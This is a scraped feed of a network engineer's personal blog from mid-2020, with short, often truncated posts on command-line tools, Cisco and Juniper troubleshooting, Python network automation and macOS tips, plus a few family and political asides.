For the longest time I used regular expressions or basic grep patterns to look for IP addresses within text files. These methods make it very difficult to find specific IP addresses in a range if it does not fall on an easy to match pattern.

Use grepcidr to eliminate RegEx and pattern matching. This command will match any IP address in the typical CIDR boundary.

Given a list of IP addresses:

My wifes breast cancer has returned...

Mon, 31 Aug 2020 15:47:41 -0500

Here is the message she sent to family and friends…

A few months ago a friend wisely said, “Cancer does not stop for a pandemic.” It sure doesn’t. It also does not stop for protests, political debates, presidential elections, or just because I want it to go away.

I am so sad to share that my breast cancer has returned and spread. It is stage 4 and it will end my life much sooner than we hoped. I am having palliative chemo treatments to attempt to slow the progression, but most likely I will have maybe a year or two (maybe less, maybe more) to enjoy my life as best I can. It is completely in God’s hands.

Is that the right USB drive?

Sun, 30 Aug 2020 21:03:06 -0500

Determining which local disk is being operated on is critically important to prevent data loss or corruption. One wrong option to the dd command has the potential to wipe out a local hard drive.

Display the internal system drives by running diskutil list with no other drives attached. These are disks you don’t want to mess with:

jemurray@mbp-2019:~ $ diskutil list
/dev/disk0 (internal, physical):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                        *500.3 GB   disk0
   1:                        EFI EFI                     314.6 MB   disk0s1
   2:                 Apple_APFS Container disk1         500.0 GB   disk0s2

/dev/disk1 (synthesized):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      APFS Container Scheme -                      +500.0 GB   disk1
                                 Physical Store disk0s2
   1:                APFS Volume Macintosh HD - Data     436.8 GB   disk1s1
   2:                APFS Volume Preboot                 82.7 MB    disk1s2
   3:                APFS Volume Recovery                528.5 MB   disk1s3
   4:                APFS Volume VM                      9.7 GB     disk1s4
   5:                APFS Volume Macintosh HD            11.0 GB    disk1s5

Insert a USB drive and run diskutil list again. Notice how the new drive shows up at the end of the list. Most of the time new disks will be /dev/disk2 or higher. However, don’t rely on that. This is why we validate every single time before running commands which have the potential to destroy data without asking. Remember what your grandpa told you, “measure twice, cut once”.

Testing Radius EAP/PEAP from the command line

Sat, 29 Aug 2020 18:36:18 -0500

The eapol_test command is used to perform a variety of EAP authentication requests within Radius from the command line. This software is found in the wpa_supplicant project.

Tools like this are helpful for production monitoring or remote troubleshooting.

First, create a EAP/PEAP generic configuration file named eapol_test.cfg:

network={
  ssid="eduroam"
  key_mgmt=IEEE8021X
  eap=PEAP
  pairwise=CCMP TKIP
  group=CCMP TKIP WEP104 WEP40
  phase2="auth=MSCHAPV2"
  identity="jemurray"
  anonymous_identity="jemurray"
  password="MyPa$$w0rd"
}

Run the eapol_test command using the configuration file, remote host IP address, radius port, and shared secret:

Running packet-tracer on a Cisco FirePower firewall

Fri, 28 Aug 2020 14:29:25 -0500

jemurray@mbp-2019:~ $ firepower.example.com
Password:
 
Copyright 2004-2018, Cisco and/or its affiliates. All rights reserved.
Cisco is a registered trademark of Cisco Systems, Inc.
All other trademarks are property of their respective owners.
 
Cisco Fire Linux OS v6.2.3 (build 13)
Cisco Firepower 9000 Series SM-36 Threat Defense v6.2.3.12 (build 80)
 
Cisco Firepower Extensible Operating System (FX-OS) Software.
 TAC support: http://www.cisco.com/tac
 Copyright (c) 2009-2016, Cisco Systems, Inc. All rights reserved.
 
        Cisco Security Services Platform
          Type ? for list of commands
fw-0-A#> connect module 1 console

Connect to the FTD:

Donald Trump

Thu, 27 Aug 2020 15:20:57 -0500

I have a mother, wife, and daughter. I love and respect these women.

Consider this direct quote from Donald Trump, the current President of the United States of America:

Yeah, that’s her. With the gold. I better use some Tic Tacs just in case I start kissing her. You know, I’m automatically attracted to beautiful — I just start kissing them. It’s like a magnet. Just kiss. I don’t even wait. And when you’re a star, they let you do it. You can do anything.

Percentage of change

Wed, 26 Aug 2020 13:40:12 -0500

Formula to calculate the percentage of change between two numbers:

(NEW - OLD)/OLD*100

As an Excel formula:

=(D124-A124)/A124*100

Copying Excel formulas without offset changes

Tue, 25 Aug 2020 10:37:29 -0500

When copying cells with formulas in Excel, the system tries to determine the proper offset of the pasted formulas. In this example, I created references to cells in other sheets. The two sheets are layed out identically. This way when the summary page is built I would only have to copy the reference formulas and change the sheet location.

However, when copying a reference formula from cell A2 to A19, Excel changed the offset in the formula from B128 to B145:

Dumping ARP tables with python and Netmiko

Mon, 24 Aug 2020 16:09:50 -0500

By using a combination of Python, Netmiko, and TextFSM, I am able to dump the current ARP table on our Cisco routers to generate a variety of diagnostic and reporting tools. The TextFSM module to Netmiko outputs the data in JSON format for easy reporting and manipulation.

Here is an example snippet using pprint to display the results:

#!/bin/env python3

from netmiko import Netmiko
from getpass import getpass
import pprint

password = getpass()

output = []

net_connect = Netmiko(host="192.168.0.1", username="jemurray", password=password, device_type="cisco_ios")

net_connect.find_prompt()

output.append(net_connect.send_command("show ip arp", use_textfsm=True))

for i in output:
    pp = pprint.PrettyPrinter(indent=4)
    pp.pprint(i)

Retrieving hidden files in TimeMachine

Sun, 23 Aug 2020 19:09:25 -0500

A few nights ago a missing > wiped out my .bash_profile file:

echo "export BASH_SILENCE_DEPRECATION_WARNING=1" > .bash_profile

This should be simple to recover from TimeMachine, except the Finder window does not display hidden (system) files.

To retrieve a file like this, open a terminal window and navigate to the locally mounted TimeMachine folder in the /Volumes directory:

jemurray@mbp-2019:~ $ cd /Volumes/MurrayBackup/Backups.backupdb/mbp-2019/Latest/Macintosh\ HD\ -\ Data/Users/jemurray

The files are there:

jemurray@mbp-2019:/Volumes/MurrayBackup/Backups.backupdb/mbp-2019/Latest/Macintosh HD - Data/Users/jemurray $ ls -al .bash_profile
lrwxr-xr-x+ 1 jemurray  staff  32 May 23 16:05 .bash_profile -> Documents/dotfiles/.bash_profile

Copy the file back:

Suppressing the bash warning in macOS 10.15

Sat, 22 Aug 2020 13:01:07 -0500

After upgrading to macOS 10.15, this warning message is displayed when opening or creating a terminal shell:

jemurray@mbp-2019:~ $ exec bash

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.

Add the following environment variable to the .bash_profile to permanently suppress the warning:

echo "export BASH_SILENCE_DEPRECATION_WARNING=1" >> .bash_profile

The warning is gone:

jemurray@mbp-2019:~ $ exec bash
jemurray@mbp-2019:~ $

Interacting with LastPass through the CLI

Fri, 21 Aug 2020 16:30:38 -0500

Using lastpass-cli enables password lookups without opening the LastPass desktop client.

jemurray@mbp-2019:~ $ lpass login lpuser@example.com
Success: Logged in as lpuser@example.com.

Generate test data without a user name:

jemurray@mbp-2019:~ $ lpass generate lpasstest 15
`+&x6%_YcuZbdua

View data:

jemurray@mbp-2019:~ $ lpass show lpasstest
lpasstest [id: 5943780687328672071]
Password: `+&x6%_YcuZbdua

Generate test data with a username:

jemurray@mbp-2019:~ $ lpass generate --username=jemurray@zweck.net lpasstest2 15
+k]e?"F5+N3`I&L

View data:

jemurray@mbp-2019:~ $ lpass show lpasstest2
lpasstest2 [id: 0]
Username: jemurray@zweck.net
Password: +k]e?"F5+N3`I&L

Search for entries:

Data-plane packet captures on the Cisco ASA

Thu, 20 Aug 2020 09:54:27 -0500

The capture command is used to view data-plane traffic flowing through a Cisco ASA. This command can be run safely during production hours with minimal performance impact to the ASA.

In this example, a capture is started on the outside and inside interface to confirm the policy either allows or blocks the flow.

capture DUOout circular-buffer interface outside match ip 192.168.200.1 255.255.255.255 192.168.100.1 255.255.255.255
 
capture DUOin circular-buffer interface inside match ip 192.168.200.1 255.255.255.255 192.168.100.1 255.255.255.255

Show the running captures:

Using strings to peek into binaries

Wed, 19 Aug 2020 15:34:04 -0500

Unlike text files, shell scripts, and other human readable file formats, looking into a binary file typically displays gibberish:

jemurray@shell:~/sec$ cat hacker
ELF>P@`9@8
          @@@@hhh   HH-==HP-=DDPtd   <<QtdRtd-==/lib64/ld-linux-x86-64.so.2GNUGNURNɇx
                                                                                     jǑ>Cem?
                                                                                             ![ j "libc.so.6system__cxa_finalize__libc_start_mainGLIBC_2.2.5_ITM_deregisterTMCloneTableH=f/DH=/H/H9tH>/Ht_regisH=y/H5r/H)HHH?HHtH/HfD=9/u/UH=.Ht?@H/Ht5/%/@%/h%/f1I^HHPTLzH
                                                         H=/-h/]{UHH@HEHfAWIAVIAUAATL%P,UH-P,SL)SHtLLDAHH9u[]A\A]A^A_8<LT1|,zRx
                                                                                                                                                          Rx
                                                                                                                                                           J
D                                                                                                                                                           ?;*3$"\eIAC
D≠]BEE E(H▮H8G@┘8A▮A(B BB▮
▮

@P      ⎺⎻⎺⎺\⎺=6(@GCC: (Deb☃▒┼ 8↓3↓▮↑6) 8↓3↓▮⎻
P

@P  @ ===?@ @0@
               !7▮@F=└▮≤=D!=== @
                                 └  @1▮@8Lk @x (@ ]8@─P→▮@5I▮@ "c⎼├⎽├┤°°↓cde⎼e±☃⎽├e⎼_├└_c┌⎺┼e⎽__d⎺_±┌⎺b▒┌_d├⎺⎼⎽_▒┤│c⎺└⎻┌e├ed↓7325__d⎺_±┌⎺b▒┌_d├⎺⎼⎽_▒┤│_°☃┼☃_▒⎼⎼▒≤_e┼├⎼≤°⎼▒└e_d┤└└≤__°⎼▒└e_d┤└└≤_☃┼☃├_▒⎼⎼▒≤_e┼├⎼≤▒▒c┐e⎼↓c__FRAME_END____☃┼☃├_▒⎼⎼▒≤_e┼d_DYNAMIC__☃┼☃├_▒⎼⎼▒≤_⎽├▒⎼├__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___┌☃bc_c⎽┤_°☃┼☃_ITM_de⎼e±☃⎽├e⎼TMC┌⎺┼eT▒b┌e_ed▒├▒⎽≤⎽├e└@@GLIBC_2↓2↓5__┌☃bc_⎽├▒⎼├_└▒☃┼@@GLIBC_2↓2↓5__d▒├▒_⎽├▒⎼├__±└⎺┼_⎽├▒⎼├____d⎽⎺_▒▒┼d┌e_IO_⎽├d☃┼_┤⎽ed__┌☃bc_c⎽┤_☃┼☃├__b⎽⎽_⎽├▒⎼├└▒☃┼__TMC_END___ITM_⎼e±☃⎽├e⎼TMC┌⎺┼eT▒b┌e__c│▒_°☃┼▒┌☃≥e@@GLIBC_2↓2↓5↓⎽≤└├▒b↓⎽├⎼├▒b↓⎽▒⎽├⎼├▒b↓☃┼├e⎼⎻↓┼⎺├e↓ABI↑├▒±↓┼⎺├e↓±┼┤↓b┤☃┌d↑☃d↓±┼┤↓▒▒⎽▒↓d≤┼⎽≤└↓d≤┼⎽├⎼↓±┼┤↓┴e⎼⎽☃⎺┼↓±┼┤↓┴e⎼⎽☃⎺┼_⎼↓⎼e┌▒↓d≤┼↓⎼e┌▒↓⎻┌├↓☃┼☃├↓⎻┌├↓±⎺├↓├e│├↓°☃┼☃↓⎼⎺d▒├▒↓e▒_°⎼▒└e_▒d⎼↓e▒_°⎼▒└e↓☃┼☃├_▒⎼⎼▒≤↓°☃┼☃_▒⎼⎼▒≤↓d≤┼▒└☃c↓±⎺├↓⎻┌├↓d▒├▒↓b⎽⎽↓c⎺└└e┼├$N⎺
                                                         ▮V^⎺\\┐⎺⎻⎻BP  PP@          <=?@ @0@0000P0-     P6V8

By using the strings command, information within the binary is displayed in a slightly “more” human readable format:

Reverse traceroute with PerfSonar

Tue, 18 Aug 2020 10:19:48 -0500

What goes out must come in, this is true for two way communication on the Internet. An outbound path may not always be the same for return traffic. One way to validate asymmetric routing is to run a traceroute from source to destination and then from destination to source. This is made difficult because most people do not have access to a system at the destination to initiate the traceroute from.

Using PerfSonar, pscheduler, and iperf3 to test network throughput problems

Mon, 17 Aug 2020 14:24:22 -0500

The PerfSonar project enables network engineers to perform a variety of troubleshooting tests. While investigating a file transfer issue over Internet2, I was able to use pscheduler on the PerfSonar servers to test both upload and download throughput.

When a PerfSonar system is configured and online, it registers in the Global PerfSonar Directory. Most of these servers are publicly available for realtime troubleshooting.

I was able to use the pScheduler utility to execute an iperf3 throughput test on a es.net server. The first run tested download speeds (no issue):

How to cut an arched top wood fence

Sun, 16 Aug 2020 18:03:08 -0500

A tree recently fell on our arched cedar fence. I purchased new planks that were a few feet too long in order to have enough extra wood to cut the matching arch. To recreate the exact same radius, I used a piece of 1" PVC pipe bent from corner to corner of a single panel. A perfect arch can be traced on the new boards. Then cut with a standard circular saw.

Basic GNUPlot from the command line

Sat, 15 Aug 2020 22:02:25 -0500

There are many tools to plot or graph data points. The most common is the spreadsheet. However, there are instances when I would like to quickly analyze a data set then throw away the results when finished.

This is when I turn to GNUPlot for quick ad-hoc graphing.

Using the example data file:

jemurray@mbp-2019:~ $ head -5 /tmp/numbers.txt
108313357.93795292	14172930.125840904	43170655.360387966
54050912.74846953	14506014.564626597	55748443.87279168
92580121.1791793	15119971.132562589	61882800.61125066
74304697.01068823	14867594.969533907	84107289.18697126
97675591.11219549	16117629.751601066	71385054.6928251

Generate a basic graph with GNUPlot:

Merging individual files into a single multi-column file

Fri, 14 Aug 2020 11:57:08 -0500

Given 3 files, each with a single row of numbers in them. The paste command merges the individual files into a single file 3 columns wide.

jemurray@mbp-2019:~ $ paste numbers1.txt numbers2.txt numbers3.txt  | head -20
108313357.93795292	14172930.125840904	43170655.360387966
54050912.74846953	14506014.564626597	55748443.87279168
92580121.1791793	15119971.132562589	61882800.61125066
74304697.01068823	14867594.969533907	84107289.18697126
97675591.11219549	16117629.751601066	71385054.6928251
86011257.2664782	13621733.780232634	58875369.19617859
70208854.04822399	14476765.122738339	49017648.672903456
98498761.85664643	13548644.71466847	84460585.70163518
114523163.63160664	13301024.071081888	45727080.25826224
100148343.43130378	13763236.664631309	46228056.05601608
113698411.99684031	12846072.939264541	42291208.56781124
112592539.57796247	13906104.570869552	80342347.3308685
114112664.70018382	14190918.77568318	93019462.20382051
80549955.55995816	16230791.99518611	77638586.17507662
109921639.49155584	13949451.427885724	67175914.95221402
111974963.93801378	14294933.221747613	61346396.22176037
104882198.3061649	14647449.865609813	56437611.68179089

Files 1, 2, and 3 look similar to this:

Thank you Teresa!

Thu, 13 Aug 2020 08:50:49 -0500

Thank you to the Southwest Airline flight attendant for helping keep my wife a little bit safer as she travels.

My wife is going through a round of chemotherapy to treat breast cancer. Many chemo drugs cause hair loss, and my wife is no exception. Like the many other people in this situation, she wears a cap to cover her head. Even with the fancy head covering, it it still fairly obvious the scourge of cancer has taken hold.

How to sort IP addresses from the command line

Wed, 12 Aug 2020 11:59:49 -0500

By breaking a list of IPv4 addresses into individual octets, the unix sort command will display the output in numerical order.

cat filewithipaddresses.txt | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n

-t . = Separator identifier used to split the IP address into individual components.
-k1,1n = Each section of the IP address is (n)umerically sorted by the (k)ey.

Given a text file with random IP address:

Even Apple listens

Tue, 11 Aug 2020 13:39:41 -0500

A few days ago I wrote a post about a change Apple was making in iOS14. If implemented, it would cause the MAC address of network-connected devices to change every 24 hours. This has the potential to wreak havoc on many complicated and expensive enterprise systems in use on large campus networks like ours.

In response, the university community came together in email to discuss the impact of this change. Everyone was encouraged to reach out to Apple with their specific issues and let them know the impact this would bring about.

Generating and using SSH keys

Mon, 10 Aug 2020 09:05:07 -0400

Summary

SSH keys, a public key cryptographic system, secures network communication and replaces plain text password authentication on remote systems. SSH is widely used as the default service to connect to shell accounts, switches, routers, git repositories, serial consoles, etc. Many of these systems require ssh keys to operate, creating the keys varies depending on the operating systems and the ssh software installed. Directions for unix-based systems, including macOS, are detailed below.

Twelve-year-old geocache

Sun, 09 Aug 2020 15:43:39 -0500

Geocaching has been around since 2000 when selective availability was disabled from public GPS signals. I have been playing on and off since January 05, 2001. Most of the geocaches I placed over the years have been stolen, vandalized, flooded out, or fell apart.

This past week my last remaining cache was flagged as missing, well the container was at least. The last entry is a picture of 2 ziplock baggies left on the ground. This cache was placed 12 years ago in 2008. Over 700 people have logged an entry, I could not let it die.

Commands I use on a regular basis: find and exec

Sat, 08 Aug 2020 11:13:48 -0500

In this example, we are using find to search for all files 24 hours old, outputting the contents, filtering the results through a Python program, and redirecting the final output to a text file.

find . -type f -mtime -1 -exec cat {} \; | ~/findAllDynamicMacAddresses.py >  ~/dynamic-mac-address.txt

The find command is a multipurpose tool for locating files and directories.

-type f - Only look for files (not directories)

-mtime 1 - Only return files that are 24 hours old or less.

iOS 14 will randomize the MAC address every 24 hours

Fri, 07 Aug 2020 16:01:49 -0500

Private Wi-Fi address is a new feature Apple is enabling by default starting with iOS14 (iPhone and iPad) and watchOS7 (Apple Watch). This feature works by randomizing the MAC address of the device before it connects to the wireless network and every 24 hours thereafter.

A MAC address is a unique address assigned to every device that connects to a wireless or wired network. The address looks like this: f0:18:98:9b:b5:b2. The first half (f0:18:98) is known as the organizational unique identifier (OUI). This part is assigned to a manufacture such as Apple, Dell, or Intel. The second half (9b:b5:b2) is assigned by the vendor. The combination of these two parts makes each MAC address unique to each individual device. No two MAC addresses overlap.

Regex to find MAC addresses with random bit set

Thu, 06 Aug 2020 16:55:08 -0500

Apple has brought to light a new feature they are enabling in iOS14 called private wi-fi addressing. Before a device connects to the network the MAC address will be randomized. This feature has the potential to wreak havoc on many enterprise systems that have historically treated the MAC address as a unique identifier. Captive portals, client reporting, mobile device managers, and a variety of wireless authentication systems are examples of systems that may rely on the uniqueness of the MAC address. While I support what Apple is trying to do, changing the default behavior with little notice is not the best way to keep our infrastructure engineers happy.

Out-of-band routing table separation in GNS3 on the Juniper vMX

Wed, 05 Aug 2020 11:45:38 -0500

While GNS3 offers console access to individual devices, I prefer direct SSH access from my home network. This way GNS3 does not need to be open and I don’t need to remember the console telnet ports.

However, mixing the out-of-band network and production (lab) networks may cause unexpected consequences such as routing conflicts or worse, peering a lab environment with a real production network. To avoid these problems, it is best practice to isolate the global routing table from the out-of-band routing table through the use of VRFs or routing-instances.

Edit files on remote hosts with vsCode and SSH

Tue, 04 Aug 2020 15:52:08 -0500

The Remote - SSH extension in Visual Studio Code allows us to edit files on a remote host over an encrypted SSH connection.

To get started, install the Remote SSH extension:

Click the green >< block in the lower left corner and add a host to SSH into:

vsCode will open the remote connection, copy the necessary software, and setup the session:

BGP authentication requires MD5 hash in TCP header

Mon, 03 Aug 2020 13:25:39 -0500

When BGP authentication is configured, a connecting client passes the MD5 hash in the TCP option header during the initial SYN packet.

Using the following configuration, it is impossible to connect to TCP port 179 without the MD5 key in the header:

jemurray@eps-l29-LAB# show protocols bgp group TEST
type external;
neighbor 10.1.1.2 {
    authentication-key "$9$WAX8-woaUH.5GD/Cpu1I-Vb"; ## SECRET-DATA
    peer-as 174;
}

When a connection is made without the MD5 key, the remote device rejects the connection as if the port is not listening:

Simulating the full Internet routing table with ExaBGP in GNS3

Sun, 02 Aug 2020 13:26:22 -0500

A combination of GNS3, a handful of Juniper vMXs, and ExaBGP allows us to simulate the WashU edge and aggregation routers used in production. In this post I will focus on how we use ExaBGP to simulate a real Internet routing table.

Network topology for one of the edge routers in GNS3:

The server running ExaBGP is an Ubuntu 18.04 Cloud Guest image from GNS3. This system has 2 network interfaces. The first one connects to the GNS3 cloud so it can bridge to a public network for updates and software packages. The second interface connects to the Juniper on the internal lab network:

Return the base path or file name from a full path

Sat, 01 Aug 2020 14:50:57 -0500

Given the full path:

/usr/local/bin/foo

Return the file name:

jemurray@mbp-2019:~ $ basename /usr/local/bin/foo
foo

Return the directory path:

jemurray@mbp-2019:~ $ dirname /usr/local/bin/foo
/usr/local/bin

Script to monitor home Internet service

Fri, 31 Jul 2020 16:11:45 -0500

Over the past few weeks, there has been trouble with our home Internet service. History proves customer service is better when you come to them with a detailed outage report. I use a combination of SmokePing for historical graphs and a custom script that runs DNS lookups and ping checks every second.

As part of the ‘script week’ series, here is a simple bash script to monitor home Internet service by performing a DNS lookup to Google servers. If that fails, it starts a timer and then checks to see if the immediate gateway router is available. This helps me determine if the issue is local to my area or something deeper in the cable providers network. I log all this information to a file which is easily referenced when calling for support.

Using vi to remove ^M characters in a text file

Thu, 30 Jul 2020 15:09:23 -0500

A text file that contains ^M characters was probably created on a DOS or Windows system and then opened on a Unix system. ^M is the DOS / Windows character for carriage-return, otherwise known as the end of a line in the text file.

To remove the characters, open the text file in vi. While in command mode type:

:% s/^M//g

Note: You may have to type: <ctrl-v><ctrl-m> to create the ^M character. It is not a ^ and M.

Creating a mock API endpoint for testing

Wed, 29 Jul 2020 11:05:01 -0500

NetBrain is a tool we use at work for CMDB, documentation, and network troubleshooting. NetBrain exposes an API which gives tools like Nornir access to dynamically generated inventory and group objects. However the modules, don’t exist yet; I am writing one.

The issue is the NetBrain system sits on an access restricted network in our remote data center, and I want to write code at home without being on VPN. By using Python and Flask, I was able to write a mock NetBrain API, that simulates connecting to the remote server. This approach has the added benefit of not using any resources on the production server while I work on the code and perform debugging.

vsCode keyboard shortcut to run Python in the terminal

Tue, 28 Jul 2020 13:39:52 -0500

I don’t like moving my fingers off the keyboard. No mouse, no arrow keys, no track pad. Productive use of time dictates finger should not move far from the home-row keys. This is why I enabled the vim extension.

To run a Python script within a terminal in vsCode you have to click the play button in the upper right corner of the screen:

Remember rule #1, I don’t want to move my fingers off the keyboard and the play button is too far away…

Easy to configure network latency graphs with SmokePing

Mon, 27 Jul 2020 07:14:14 -0500

When all you need is a simple network latency graphing tool, take a look at SmokePing. There are many open-source and free tools, but they tend to be overly complex and difficult to configure for small projects or simple graphing needs.

SmokePing is light-weight and comes preloaded with probes to graph http, dns, ssh, ping, tcp ports, and more.

I run SmokePing for both work and personal projects. At work we use it to graph latency between different sites and data centers. At 60 second intervals and 365 days of historical records, it is an excellent tool for trending or troubleshooting user issues. At home I use it to graph Internet response times to popular websites and their DNS servers. This information is used to validate my ISP works as expected and helps to correlate outages if there are problems.

Google Wifi diagnostic menus

Sun, 26 Jul 2020 13:09:02 -0500

Diagnostic pages for the Google Wifi home router:

http://onhub.here/ - Basic system status (online / offline). Open the Google Wifi app to access more information.
http://on.here - Check all of the devices that are available on the guest network. For example, guests who are using the Wifi network, can control Philips Hue lights directly with On.Here without needing a separate app.
http://onhub.here/api/v1/diagnostic-report - Generate and download a detailed diagnostic report.
http://onhub.here/api/v1/welcome-mat - Information about the guest network.
http://onhub.here/api/v1/status - Software version, systems hardware ID, WAN settings, etc.
http://onhub.here/api/v1/connected-devices - Hue bridge information.
http://onhub.here/api/v1/get-attestation-information - No longer returns anything.
http://onhub.here/api/v1/get-endorsement-information - No longer returns anything.
http://onhub.here/api/v1/get-group-configuration - Google Wifi group id.
http://onhub.here/api/v1/get-shmac?ip=insertClientIP - Device ID for a given IP.
http://onhub.here/api/v1/wan-configuration - WAN configuration.
http://onhub.here/api/v1/developer-configuration - Update URL and channel.

These domains can be used to access the local pages:

grep for a process without grep returning grep

Sat, 25 Jul 2020 14:37:14 -0500

Searching for a process with grep, in addition to the search term, the output also includes the grep statement itself:

jemurray@shell:~$ ps -ef | grep bgp
jemurray  8054 23273  0 19:38 pts/7    00:00:00 grep bgp
jemurray 25310 14989  0 Jul22 pts/2    00:28:29 ./bgpalerter-linux-x64

By putting one of the search term characters between []’s, grep is no longer returned in the results:

jemurray@shell:~$ ps -ef | grep [b]gp
jemurray 25310 14989  0 Jul22 pts/2    00:28:29 ./bgpalerter-linux-x64

Netmiko, Napalm, Nornir supported devices

Fri, 24 Jul 2020 12:30:49 -0500

Netmiko, Napalm, and Nornir all use drivers or connection handlers for establishing remote connectivity to networking devices. The keywords needed to enable remote sessions was not obvious to find. Here is a consolidated list of connection keyword types necessary to load the proper modules.

Each framework is a little different. Netmiko for example uses connection handlers, Napalm uses drivers, and Nornir uses a combination of Netmiko or Napalm depending on which function is selected.

Raspberry PI as a remote serial console

Thu, 23 Jul 2020 12:45:10 -0500

Build a multi-port remote serial console for under $100 with a Raspberry PI and a few USB serial cables:

Parts:

Raspberry PI
USB power supply
USB serial cables
Devices that require a serial console

Download and install the Raspberry PI OS following these instructions: https://www.raspberrypi.org/downloads/raspberry-pi-os/

Using a keyboard and monitor, log in with the pi username and change the password:

pi@raspberrypi:~ $ passwd
Changing password for pi.
Current password:
New password:
Retype new password:
Password changed

Enable remote ssh access:

CLI based subnet calculator

Wed, 22 Jul 2020 12:18:02 -0500

My favorite subnet calculator is the terminal based command sipcalc. While it is no longer under active development, it has every feature a network engineer could need.

Features (IPv4)

Multiple address and netmask input formats.
Retrieving of address information from interfaces.
Classfull and CIDR output.
Multiple address and netmask output formats (dotted quad, hex, number of bits).
Output of broadcast address, network class, Cisco wildcard, hosts/range, network range.
Output of multiple types of bitmaps.
Output of a user-defined number of extra networks.
Multiple networks input from commandline.
DNS resolutions of hostnames.
Parsing of a newline separated list of networks from standard input (STDIN).
The ability to “split” a network based on a smaller netmask, also with recursive runs on the gener.

Features (IPv6)

Mouse mode with tmux in iTerm2

Tue, 21 Jul 2020 12:50:03 -0500

I was troubleshooting an issue where mouse mode stopped working while using iTerm2 on macOS. The iTerm2 option mouse reporting must be enabled for mouse mode to function properly:

Next validate, mouse mode is configured in the ~/.tmux.conf file, with the following command:

set -g mouse on

Verify mouse mode is working by starting tmux and running: CTRL+B :show -g, the following option should appear in the output:

...
mouse on
...

Select some text or scroll back while in tmux. The scroll back buffer in the top right should appear and highlighted text will be yellow:

Syntax highlighting in Hugo

Mon, 20 Jul 2020 11:14:31 -0500

The back-ticks ` or ``` are used to keep original text formatting within Hugo rendered pages.

Example 1, single back-tick:

A single back-tick at the start and end of the line

Example 2, triple back-tick:

Three back-ticks above and three back-ticks below this line

Using back-ticks for code keeps the formatting, but the output is not pretty or easy to read:

def fix_hostname(hostname):
    hostname = re.sub(r'[\\/:"*?<>|]+', "-", hostname)
    hostname = hostname.lower()
    return hostname

hostname = fix_hostname(device["name"])

In Hugo, the highlight short-code is used for syntax highlighting. Wrap the code with the following lines:

Cisco 16.x reports drops in bytes not packets

Sun, 19 Jul 2020 10:00:00 -0500

Most network devices report interface drops in packets. At some point Cisco switches running the 16.x code started reporting drops in bytes. Reporting in bytes dramatically inflates the drop counters which makes detecting congestion issues more difficult.

Here is an example of the Discard counters reporting in bytes:

cisco-3850# show interfaces counters errors

Port        Align-Err     FCS-Err    Xmit-Err     Rcv-Err  UnderSize  OutDiscards
Te1/0/1             0           0           0           1          0            0
Te1/0/2             0           0           0           0          0            0
Te1/0/3             0           0           0           0          0   7569381402
Te1/0/4             0           0           0           0          0  32180592642
Te1/0/5             0           0           0           0          0            0
Te1/0/6             0           0           0           0          0    705662223
Te1/0/7             0           0           0           0          0            0
Te1/0/8             0           0           0           0          0            0
Te1/0/9             0           0           0           0          0            0
Te1/0/10            0           0           0           0          0            0
Te1/0/11            0           0           0           0          0            0
Te1/0/12            0           0           0           0          0            0
Te1/0/13            0           0           0           0          0            0
Te1/0/14            0           0           0           0          0            0
Te1/0/15            0           0           0           0          0            0
Te1/0/16            0           0           0           0          0            0
Te1/0/17            0           0           0           0          0            0
Te1/0/18            0           0           0           0          0            0
Te1/0/19            0           0           0           0          0            0
Te1/0/20            0           0           0           0          0            0
Te1/0/21            0           0           0           0          0            0
Te1/0/22            0           0           0           0          0            0
Te1/0/23            0           0           0           0          0            0
Te1/0/24            0           0           0           0          0    847069411

Adding this configuration statement to the switch will change reporting from bytes to packets:

Removing unsafe characters with Python and regex

Sat, 18 Jul 2020 18:03:25 -0500

While working on a program which uses data from an internal CMDB to build ssh aliases, I ran into a problem. Some of the devices have special characters in the hostname, for example:

DEBUG pre-fix: wcm-449-wu-fw-0/stby
DEBUG pre-fix: wcm-449-wu-fw-0/act

To remove the unsafe characters, the hostname variable is passed to a cleaning function each time it is set:

def fix_hostname(hostname):
    hostname = re.sub(r'[\\/:"*?<>|]+', "-", hostname)
    hostname = hostname.lower()
    return hostname

hostname = fix_hostname(device["name"])

The unsafe characters are converted to -:

How to test if a JSON key exists with Python

Fri, 17 Jul 2020 09:36:07 -0500

Using an if statement to test if a JSON key exists in Python results in the following error:

Traceback (most recent call last):
  File "/Users/jemurray/Documents/src/personalPython/jsontest.py", line 56, in <module>
    if i["keyDoesNotExist"]:
KeyError: 'keyDoesNotExist'

Instead, use the in statement to test if the JSON key exists:

# Looking for a JSON key using the `in` statement
if "keyDoesNotExist" not in i:
    print("Key not found, no errors")

Here is an example using if and in statements and the output they return:

Python Script to dump all devices from NetBrain

Thu, 16 Jul 2020 09:17:00 -0500

The NetBrain API requires a few steps before getting at the data:

Login and retrieve the token for API calls
Set the domain and tenant where the data is stored
Make the API calls to do work
Logout so you don’t take up login sessions

The CMDB/Devices API call only returns 100 devices at a time. There is logic in this script to deal with that shortcoming.

All of the output is for debugging purposes only. They key takeaways from this post is to show the login / logout methods and how to dump a CMDB that has more then 100 entries in it.

How to check iCloud Drive file transfer status on macOS

Wed, 15 Jul 2020 14:59:56 -0500

iCloud Drive is used to synchronize files across iDevice systems. However, it is not obvious what the status of the file synchronization is. Third-party cloud vendors such as Box, Dropbox, and Google Drive all have an icon in the menu bar which displays the sync status.

With iCloud Drive you need to open finder and enable the Status Bar. By default there is no iCloud drive synchronization indicator:

To enable iCloud synchronization status in the finder window, select View -> Show Status Bar

Finding configuration lines on Cisco hardware with Python

Tue, 14 Jul 2020 10:13:14 -0500

I love simple automation and scripting.

In this example, we had to audit thousands of network devices for a specific configuration line. Doing this by hand would take hours, with Python it takes minutes. (Yes, we will automate the fix at some point).

Basic conditions and loops combined with a handful of network libraries and regular expression knowledge can go a long way to making a more productive day.

#!/usr/local/bin/python3

from netmiko import Netmiko
from getpass import getpass

password = getpass()

input = open('washu-3850-inventory.txt', 'r')

for i in input:
    output = []
    devices = i.split()

    if devices[0]:
        try:
            net_connect = Netmiko(host=devices[1], username="myusername", password=password, device_type="cisco_ios")
            net_connect.find_prompt()
        except:
            next

        output.append(net_connect.send_command("show run | inc frame", use_textfsm=True))

        if output[0]:
            print("Found on " + devices[0] + " " + output[0])
        else:
            print("Not found on " + devices[0])

Testing a NTP server

